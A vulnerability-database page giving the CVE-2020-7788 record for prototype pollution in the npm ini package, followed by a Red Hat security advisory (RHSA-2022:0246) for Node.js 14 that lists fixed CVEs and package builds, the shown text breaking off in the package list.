Action not permitted
Modal body text goes here.
CVE-2020-7788
Vulnerability from cvelistv5
Published
2020-12-11 10:45
Modified
2024-09-16 23:41
Severity ?
EPSS score ?
Summary
Prototype Pollution
References
▼ | URL | Tags | |
---|---|---|---|
report@snyk.io | https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1 | Patch, Third Party Advisory | |
report@snyk.io | https://lists.debian.org/debian-lts-announce/2020/12/msg00032.html | Mailing List, Third Party Advisory | |
report@snyk.io | https://snyk.io/vuln/SNYK-JS-INI-1048974 | Exploit, Third Party Advisory |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T09:41:01.567Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://snyk.io/vuln/SNYK-JS-INI-1048974" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1" }, { "name": "[debian-lts-announce] 20201221 [SECURITY] [DLA 2503-1] node-ini security update", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2020/12/msg00032.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "ini", "vendor": "n/a", "versions": [ { "lessThan": "1.3.6", "status": "affected", "version": "unspecified", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "value": "Eugene Lim" }, { "lang": "en", "value": "Government Technology Agency Cyber Security Group" } ], "datePublic": "2020-12-11T00:00:00", "descriptions": [ { "lang": "en", "value": "This affects the package ini before 1.3.6. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "exploitCodeMaturity": "PROOF_OF_CONCEPT", "integrityImpact": "LOW", "privilegesRequired": "NONE", "remediationLevel": "NOT_DEFINED", "reportConfidence": "NOT_DEFINED", "scope": "UNCHANGED", "temporalScore": 6.9, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "description": "Prototype Pollution", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-12-21T16:06:11", "orgId": "bae035ff-b466-4ff4-94d0-fc9efd9e1730", "shortName": "snyk" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://snyk.io/vuln/SNYK-JS-INI-1048974" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1" }, { "name": "[debian-lts-announce] 20201221 [SECURITY] [DLA 2503-1] node-ini security update", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "https://lists.debian.org/debian-lts-announce/2020/12/msg00032.html" } ], "title": "Prototype Pollution", "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "report@snyk.io", "DATE_PUBLIC": "2020-12-11T10:43:26.139627Z", "ID": "CVE-2020-7788", "STATE": "PUBLIC", "TITLE": "Prototype Pollution" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "ini", "version": { "version_data": [ { "version_affected": "\u003c", "version_value": "1.3.6" } ] } } ] }, "vendor_name": "n/a" } ] } }, "credit": [ { "lang": "eng", "value": "Eugene Lim" }, { "lang": "eng", "value": "Government Technology Agency Cyber Security Group" } ], "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "This affects the package ini before 1.3.6. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context." } ] }, "impact": { "cvss": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P", "version": "3.1" } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Prototype Pollution" } ] } ] }, "references": { "reference_data": [ { "name": "https://snyk.io/vuln/SNYK-JS-INI-1048974", "refsource": "MISC", "url": "https://snyk.io/vuln/SNYK-JS-INI-1048974" }, { "name": "https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1", "refsource": "MISC", "url": "https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1" }, { "name": "[debian-lts-announce] 20201221 [SECURITY] [DLA 2503-1] node-ini security update", "refsource": "MLIST", "url": "https://lists.debian.org/debian-lts-announce/2020/12/msg00032.html" } ] } } } }, "cveMetadata": { "assignerOrgId": "bae035ff-b466-4ff4-94d0-fc9efd9e1730", "assignerShortName": "snyk", "cveId": "CVE-2020-7788", "datePublished": "2020-12-11T10:45:14.077606Z", "dateReserved": "2020-01-21T00:00:00", "dateUpdated": "2024-09-16T23:41:44.616Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1", "meta": { "nvd": "{\"cve\":{\"id\":\"CVE-2020-7788\",\"sourceIdentifier\":\"report@snyk.io\",\"published\":\"2020-12-11T11:15:11.447\",\"lastModified\":\"2022-12-02T19:40:15.550\",\"vulnStatus\":\"Analyzed\",\"descriptions\":[{\"lang\":\"en\",\"value\":\"This affects the package ini before 1.3.6. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.\"},{\"lang\":\"es\",\"value\":\"Esto afecta al paquete ini versiones anteriores a 1.3.6.\u0026#xa0;Si un atacante env\u00eda un archivo INI malicioso a una aplicaci\u00f3n que lo analiza con ini.parse, contaminar\u00e1 el prototipo de la aplicaci\u00f3n.\u0026#xa0;Esto puede ser explotado a\u00fan m\u00e1s dependiendo del contexto\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9},{\"source\":\"report@snyk.io\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"LOW\",\"baseScore\":7.3,\"baseSeverity\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.4}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:N/C:P/I:P/A:P\",\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"PARTIAL\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"PARTIAL\",\"baseScore\":7.5},\"baseSeverity\":\"HIGH\",\"exploitabilityScore\":10.0,\"impactScore\":6.4,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-1321\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:ini_project:ini:*:*:*:*:*:node.js:*:*\",\"versionEndExcluding\":\"1.3.6\",\"matchCriteriaId\":\"93EF44F5-672B-4AF8-8C37-888F3065C28E\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"DEECE5FC-CACF-4496-A3E7-164736409252\"}]}]}],\"references\":[{\"url\":\"https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1\",\"source\":\"report@snyk.io\",\"tags\":[\"Patch\",\"Third Party Advisory\"]},{\"url\":\"https://lists.debian.org/debian-lts-announce/2020/12/msg00032.html\",\"source\":\"report@snyk.io\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"https://snyk.io/vuln/SNYK-JS-INI-1048974\",\"source\":\"report@snyk.io\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]}]}}" } }
rhsa-2022_0246
Vulnerability from csaf_redhat
Published
2022-01-25 09:28
Modified
2024-11-15 10:44
Summary
Red Hat Security Advisory: nodejs:14 security, bug fix, and enhancement update
Notes
Topic
An update for the nodejs:14 module is now available for Red Hat Enterprise Linux 8.4 Extended Update Support.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language.
The following packages have been upgraded to a later upstream version: nodejs (14.18.2), nodejs-nodemon (2.0.15). (BZ#2027608)
Security Fix(es):
* nodejs-json-schema: Prototype pollution vulnerability (CVE-2021-3918)
* nodejs-ini: Prototype pollution via malicious INI file (CVE-2020-7788)
* nodejs-glob-parent: Regular expression denial of service (CVE-2020-28469)
* nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes (CVE-2021-3807)
* normalize-url: ReDoS for data URLs (CVE-2021-33502)
* nodejs-tar: Insufficient symlink protection due to directory cache poisoning using symbolic links allowing arbitrary file creation and overwrite (CVE-2021-37701)
* nodejs-tar: Insufficient symlink protection due to directory cache poisoning using symbolic links allowing arbitrary file creation and overwrite (CVE-2021-37712)
* llhttp: HTTP Request Smuggling due to spaces in headers (CVE-2021-22959)
* llhttp: HTTP Request Smuggling when parsing the body of chunked requests (CVE-2021-22960)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Moderate" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "An update for the nodejs:14 module is now available for Red Hat Enterprise Linux 8.4 Extended Update Support.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. \n\nThe following packages have been upgraded to a later upstream version: nodejs (14.18.2), nodejs-nodemon (2.0.15). (BZ#2027608)\n\nSecurity Fix(es):\n\n* nodejs-json-schema: Prototype pollution vulnerability (CVE-2021-3918)\n\n* nodejs-ini: Prototype pollution via malicious INI file (CVE-2020-7788)\n\n* nodejs-glob-parent: Regular expression denial of service (CVE-2020-28469)\n\n* nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes (CVE-2021-3807)\n\n* normalize-url: ReDoS for data URLs (CVE-2021-33502)\n\n* nodejs-tar: Insufficient symlink protection due to directory cache poisoning using symbolic links allowing arbitrary file creation and overwrite (CVE-2021-37701)\n\n* nodejs-tar: Insufficient symlink protection due to directory cache poisoning using symbolic links allowing arbitrary file creation and overwrite (CVE-2021-37712)\n\n* llhttp: HTTP Request Smuggling due to spaces in headers (CVE-2021-22959)\n\n* llhttp: HTTP Request Smuggling when parsing the body of chunked requests (CVE-2021-22960)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2022:0246", "url": "https://access.redhat.com/errata/RHSA-2022:0246" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#moderate", "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "category": "external", "summary": "1907444", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1907444" }, { "category": "external", "summary": "1945459", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1945459" }, { "category": "external", "summary": "1964461", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1964461" }, { "category": "external", "summary": "1999731", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1999731" }, { "category": "external", "summary": "1999739", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1999739" }, { "category": "external", "summary": "2007557", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2007557" }, { "category": "external", "summary": "2014057", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2014057" }, { "category": "external", "summary": "2014059", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2014059" }, { "category": "external", "summary": "2024702", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2024702" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2022/rhsa-2022_0246.json" } ], "title": "Red Hat Security Advisory: nodejs:14 security, bug fix, and enhancement update", "tracking": { "current_release_date": "2024-11-15T10:44:30+00:00", "generator": { "date": "2024-11-15T10:44:30+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.1" } }, "id": "RHSA-2022:0246", "initial_release_date": "2022-01-25T09:28:51+00:00", "revision_history": [ { "date": "2022-01-25T09:28:51+00:00", "number": "1", "summary": "Initial version" }, { "date": "2022-01-25T09:28:51+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-11-15T10:44:30+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat Enterprise Linux AppStream EUS (v.8.4)", "product": { "name": "Red Hat Enterprise Linux AppStream EUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS", "product_identification_helper": { "cpe": "cpe:/a:redhat:rhel_eus:8.4::appstream" } } } ], "category": "product_family", "name": "Red Hat Enterprise Linux" }, { "branches": [ { "category": "product_version", "name": "nodejs:14:8040020211213111158:522a0ee4", "product": { "name": "nodejs:14:8040020211213111158:522a0ee4", "product_id": "nodejs:14:8040020211213111158:522a0ee4", "product_identification_helper": { "purl": "pkg:rpmmod/redhat/nodejs@14:8040020211213111158:522a0ee4" } } }, { "category": "product_version", "name": "nodejs-docs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.noarch", "product": { "name": "nodejs-docs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.noarch", "product_id": "nodejs-docs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-docs@14.18.2-2.module%2Bel8.4.0%2B13643%2B6c0ebf22?arch=noarch\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.noarch", "product": { "name": "nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.noarch", "product_id": "nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-nodemon@2.0.15-1.module%2Bel8.4.0%2B13503%2Bfc29810b?arch=noarch" } } }, { "category": "product_version", "name": "nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "product": { "name": "nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "product_id": "nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-packaging@23-3.module%2Bel8.3.0%2B6519%2B9f98ed83?arch=noarch" } } } ], "category": "architecture", "name": "noarch" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "product": { "name": "nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "product_id": "nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@14.18.2-2.module%2Bel8.4.0%2B13643%2B6c0ebf22?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "product": { "name": "nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "product_id": "nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debuginfo@14.18.2-2.module%2Bel8.4.0%2B13643%2B6c0ebf22?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "product": { "name": "nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "product_id": "nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debugsource@14.18.2-2.module%2Bel8.4.0%2B13643%2B6c0ebf22?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "product": { "name": "nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "product_id": "nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-devel@14.18.2-2.module%2Bel8.4.0%2B13643%2B6c0ebf22?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "product": { "name": "nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "product_id": "nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-full-i18n@14.18.2-2.module%2Bel8.4.0%2B13643%2B6c0ebf22?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.aarch64", "product": { "name": "npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.aarch64", "product_id": "npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/npm@6.14.15-1.14.18.2.2.module%2Bel8.4.0%2B13643%2B6c0ebf22?arch=aarch64\u0026epoch=1" } } } ], "category": "architecture", "name": "aarch64" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.src", "product": { "name": "nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.src", "product_id": "nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@14.18.2-2.module%2Bel8.4.0%2B13643%2B6c0ebf22?arch=src\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.src", "product": { "name": "nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.src", "product_id": "nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-nodemon@2.0.15-1.module%2Bel8.4.0%2B13503%2Bfc29810b?arch=src" } } }, { "category": "product_version", "name": "nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "product": { "name": "nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "product_id": "nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-packaging@23-3.module%2Bel8.3.0%2B6519%2B9f98ed83?arch=src" } } } ], "category": "architecture", "name": "src" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "product": { "name": "nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "product_id": "nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@14.18.2-2.module%2Bel8.4.0%2B13643%2B6c0ebf22?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "product": { "name": "nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "product_id": "nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debuginfo@14.18.2-2.module%2Bel8.4.0%2B13643%2B6c0ebf22?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "product": { "name": "nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "product_id": "nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debugsource@14.18.2-2.module%2Bel8.4.0%2B13643%2B6c0ebf22?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "product": { "name": "nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "product_id": "nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-devel@14.18.2-2.module%2Bel8.4.0%2B13643%2B6c0ebf22?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "product": { "name": "nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "product_id": "nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-full-i18n@14.18.2-2.module%2Bel8.4.0%2B13643%2B6c0ebf22?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.ppc64le", "product": { "name": "npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.ppc64le", "product_id": "npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/npm@6.14.15-1.14.18.2.2.module%2Bel8.4.0%2B13643%2B6c0ebf22?arch=ppc64le\u0026epoch=1" } } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "product": { "name": "nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "product_id": "nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@14.18.2-2.module%2Bel8.4.0%2B13643%2B6c0ebf22?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "product": { "name": "nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "product_id": "nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debuginfo@14.18.2-2.module%2Bel8.4.0%2B13643%2B6c0ebf22?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "product": { "name": "nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "product_id": "nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debugsource@14.18.2-2.module%2Bel8.4.0%2B13643%2B6c0ebf22?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "product": { "name": "nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "product_id": "nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-devel@14.18.2-2.module%2Bel8.4.0%2B13643%2B6c0ebf22?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "product": { "name": "nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "product_id": "nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-full-i18n@14.18.2-2.module%2Bel8.4.0%2B13643%2B6c0ebf22?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.s390x", "product": { "name": "npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.s390x", "product_id": "npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/npm@6.14.15-1.14.18.2.2.module%2Bel8.4.0%2B13643%2B6c0ebf22?arch=s390x\u0026epoch=1" } } } ], "category": "architecture", "name": "s390x" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "product": { "name": "nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "product_id": "nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@14.18.2-2.module%2Bel8.4.0%2B13643%2B6c0ebf22?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "product": { "name": "nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "product_id": "nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debuginfo@14.18.2-2.module%2Bel8.4.0%2B13643%2B6c0ebf22?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "product": { "name": "nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "product_id": "nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debugsource@14.18.2-2.module%2Bel8.4.0%2B13643%2B6c0ebf22?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": 